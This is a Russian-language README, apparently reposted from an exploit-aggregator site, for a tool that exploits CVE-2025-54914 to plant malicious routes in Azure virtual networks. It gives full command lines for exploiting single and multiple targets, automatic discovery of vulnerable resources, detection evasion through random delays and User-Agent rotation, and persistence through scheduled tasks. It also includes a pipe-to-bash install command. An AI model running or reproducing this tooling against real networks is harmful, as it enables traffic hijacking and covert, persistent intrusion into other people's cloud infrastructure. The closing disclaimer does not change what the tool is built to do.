## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ASH1996X-CVE-2025-54914-POC
# CVE-2025-54914 Эксплойт маршрутов Azure
## Обзор
Это улучшенная реализация эксплойта для маршрутизации сети Azure по уязвимости CVE-2025-54914. Данная версия сохраняет основную функциональность CVE, добавляя такие возможности, как персистентность, обход обнаружения, сканирование нескольких целей и обработка ошибок.
## Возможности
### Базовая функциональность CVE
* **Создание маршрута** : Создание вредоносных маршрутов в виртуальных сетях Azure
* **Удаление маршрута** : Удаление созданных маршрутов для очистки
* **Совместимость с API** : Работает с Azure Management API 2025-09-01
* **Аутентификация** : Поддерживает Azure CLI и ручную аутентификацию по токену
### Дополнительные возможности
* **Методы обхода** : Случайные задержки, ротация User-Agent, обфускация запросов
* **Персистентность** : Создание запланированных задач, режим непрерывного мониторинга
* **Многоцелевое сканирование** : Одновременное сканирование и эксплуатация нескольких целей
* **Полноценное отчётность** : Детальные отчёты с анализом успехов/неудач
* **Обработка ошибок** : Корректная обработка сбоев и восстановление
* **Управление конфигурацией** : Конфигурация целей на основе JSON
* **Обнаружение целей** : Автоматическое обнаружение уязвимых ресурсов
* **Оценка рисков** : Анализ уязвимостей и оценка рисков
## Установка
### Предварительные требования
root@kitploit:~
# Установка зависимостей Python
pip install requests
# Установка Azure CLI (для аутентификации)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
### Настройка
root@kitploit:~
# Назначение прав на выполнение скриптов
chmod +x exploit.py
chmod +x exploit_utils.py
# Аутентификация в Azure
az login
## Использование
### Базовое использование
#### Эксплуатация одной цели
root@kitploit:~
# Создание маршрута на одной цели
python exploit.py \
--subscription-id "12345678-1234-1234-1234-123456789012" \
--resource-group "production-rg" \
--vnet-name "prod-vnet" \
--subnet-name "prod-subnet" \
--address-prefix "10.0.1.0/24" \
--next-hop-ip "10.0.2.5"
# Удаление маршрута
python exploit.py \
--subscription-id "12345678-1234-1234-1234-123456789012" \
--resource-group "production-rg" \
--vnet-name "prod-vnet" \
--subnet-name "prod-subnet" \
--route-name "exploit-route-1" \
--operation delete
#### Эксплуатация нескольких целей
root@kitploit:~
# Создание файла конфигурации
python exploit_utils.py discover --output targets.json
# Эксплуатация всех целей
python exploit.py --targets-file targets.json --operation create
#### Режим сканирования
root@kitploit:~
# Сканирование целей без эксплуатации
python exploit.py --targets-file targets.json --scan-only
#### Режим персистентности
root@kitploit:~
# Включение персистентности с интервалом 30 минут
python exploit.py --targets-file targets.json --persistence-mode --interval 30
### Расширенное использование
#### Обход и скрытность
root@kitploit:~
# Пользовательские диапазоны задержек для обхода
python exploit.py \
--targets-file targets.json \
--delay-min 1.0 \
--delay-max 5.0 \
--max-workers 5
#### Режим холостого прогона
root@kitploit:~
# Тестирование без фактической эксплуатации
python exploit.py --targets-file targets.json --dry-run
#### Детальное логирование
root@kitploit:~
# Включение отладки
python exploit.py \
--targets-file targets.json \
--log-level DEBUG \
--log-file exploit.log
## Конфигурация
### Формат конфигурации целей
root@kitploit:~
{
"targets": [
{
"subscription_id": "12345678-1234-1234-1234-123456789012",
"resource_group": "production-rg",
"vnet_name": "prod-vnet",
"subnet_name": "prod-subnet",
"route_name": "exploit-route-1",
"address_prefix": "10.0.1.0/24",
"next_hop_type": "VirtualAppliance",
"next_hop_ip": "10.0.2.5",
"api_version": "2025-09-01",
"priority": 1
}
],
"metadata": {
"description": "Конфигурация целей для CVE-2025-54914",
"created": "2025-01-09",
"version": "1.0"
}
}
### Переменные окружения
root@kitploit:~
# Токен доступа Azure (альтернатива Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"
# Уровень логирования
export LOG_LEVEL="INFO"
## Вспомогательные скрипты
### Обнаружение целей
root@kitploit:~
# Обнаружение всех доступных целей
python exploit_utils.py discover --output discovered_targets.json
# Обнаружение конкретных подписок
python exploit_utils.py discover \
--subscription-ids "sub1" "sub2" \
--output targets.json \
--report discovery_report.txt
### Генерация конфигурации
root@kitploit:~
# Создание конфигурации эксплойта из обнаруженных целей
python exploit_utils.py config \
--input discovered_targets.json \
--output exploit_config.json \
--address-prefix "10.0.1.0/24" \
--next-hop-ip "10.0.2.5"
### Анализ уязвимостей
root@kitploit:~
# Анализ целей для оценки рисков
python exploit_utils.py analyze \
--input targets.json \
--output vulnerability_report.txt
## Функции безопасности
### Методы обхода
* **Время отправки запросов** : Случайные задержки между запросами
* **Ротация User-Agent** : Несколько пользовательских агентов браузеров
* **Обфускация заголовков** : Реалистичные HTTP-заголовки
* **Проверка SSL** : Корректная проверка сертификатов
### Механизмы персистентности
* **Запланированные задачи** : Создание задач в планировщике Windows
* **Непрерывный режим** : Долговременная персистентность
* **Управление сессиями** : Сохранение состояния между запусками
* **Персистентность конфигурации** : Сохранение настроек на диск
### Обработка ошибок
* **Корректная деградация** : Продолжение работы при отдельных сбоях
* **Защита от тайм-аутов** : Предотвращение зависания запросов
* **Обработка сигналов** : Чистое завершение при прерывании
* **Очистка ресурсов** : Автоматическая очистка при выходе
## Отчётность
### Отчёты об эксплуатации
* **Результаты операций** : Успех/неудача для каждой цели
* **Временная информация** : Временные метки выполнения
* **Детали ошибок** : Подробные сообщения об ошибках
* **Итоговая статистика** : Общие показатели успешности
### Отчёты об обнаружении
* **Инвентаризация целей** : Полный список обнаруженных ресурсов
* **Разбивка по подпискам** : Цели, сгруппированные по подпискам
* **Детали ресурсов** : Информация о VNet, подсети и местоположении
### Анализ уязвимостей
* **Оценка рисков** : Категоризация рисков: высокий/средний/низкий
* **Индикаторы production** : Идентификация производственных сред
* **Анализ тегов** : Оценка рисков на основе тегов ресурсов
## Рекомендации
### Операционная безопасность
1. **Используйте холостой прогон** : Всегда сначала тестируйте с `--dry-run`
2. **Ограничьте область** : Начинайте с непроизводственных сред
3. **Мониторьте логи** : Просматривайте логи на предмет неожиданного поведения
4. **Очищайте** : Удаляйте созданные маршруты после тестирования
### Оптимизация производительности
1. **Лимиты воркеров** : Настраивайте `--max-workers` в зависимости от мощности системы
2. **Настройка задержек** : Балансируйте скрытность и скорость с помощью параметров задержки
3. **Пакетная обработка** : Используйте файлы целей для масштабных операций
4. **Мониторинг ресурсов** : Следите за системными ресурсами во время выполнения
### Восстановление после ошибок
1. **Проверьте логи** : Анализируйте сообщения об ошибках для диагностики
2. **Проверьте разрешения** : Убедитесь в наличии необходимых прав Azure
3. **Проверьте сетевое подключение** : Убедитесь в доступе к интернету
4. **Проверьте токен** : Проверьте статус аутентификации Azure CLI
## Устранение неполадок
### Часто встречающиеся проблемы
#### Ошибки аутентификации
root@kitploit:~
# Повторная аутентификация в Azure
az login
# Проверка текущего аккаунта
az account show
# Список доступных подписок
az account list
#### Ошибки разрешений
root@kitploit:~
# Проверка необходимых разрешений
az role assignment list --assignee $(az account show --query user.name -o tsv)
#### Сетевые ошибки
root@kitploit:~
# Проверка соединения
curl -I https://management.azure.com
# Проверка настроек прокси
echo $HTTP_PROXY
echo $HTTPS_PROXY
### Режим отладки
root@kitploit:~
# Включение подробного логирования
python exploit.py --log-level DEBUG --log-file debug.log
# Просмотр файла лога
tail -f debug.log
## Юридические и этические соображения
⚠️ **ВАЖНО** : Данный инструмент предназначен только для авторизованного тестирования безопасности.
* **Требуется авторизация** : Используйте только на системах, которыми владеете, или на которые имеете явное разрешение на тестирование.
* **Соблюдение законодательства** : Обеспечьте соответствие местным законам и нормативным актам.
* **Ответственное раскрытие** : Сообщайте об уязвимостях через надлежащие каналы.
* **Образовательное использование** : Инструмент предназначен для образовательных и исследовательских целей.
## Лицензия
Данный проект лицензирован только для исследовательского и образовательного использования. Коммерческое использование требует явного разрешения.
## Участие в разработке
1. Сделайте форк репозитория
2. Создайте ветку для новой функции
3. Внесите изменения
4. Добавьте тесты (если применимо)
5. Отправьте pull request
## Поддержка
По вопросам и проблемам:
1. Ознакомьтесь с разделом устранения неполадок
2. Просмотрите логи на предмет деталей ошибок
3. Создайте issue с подробной информацией
4. Приложите соответствующую конфигурацию и сообщения об ошибках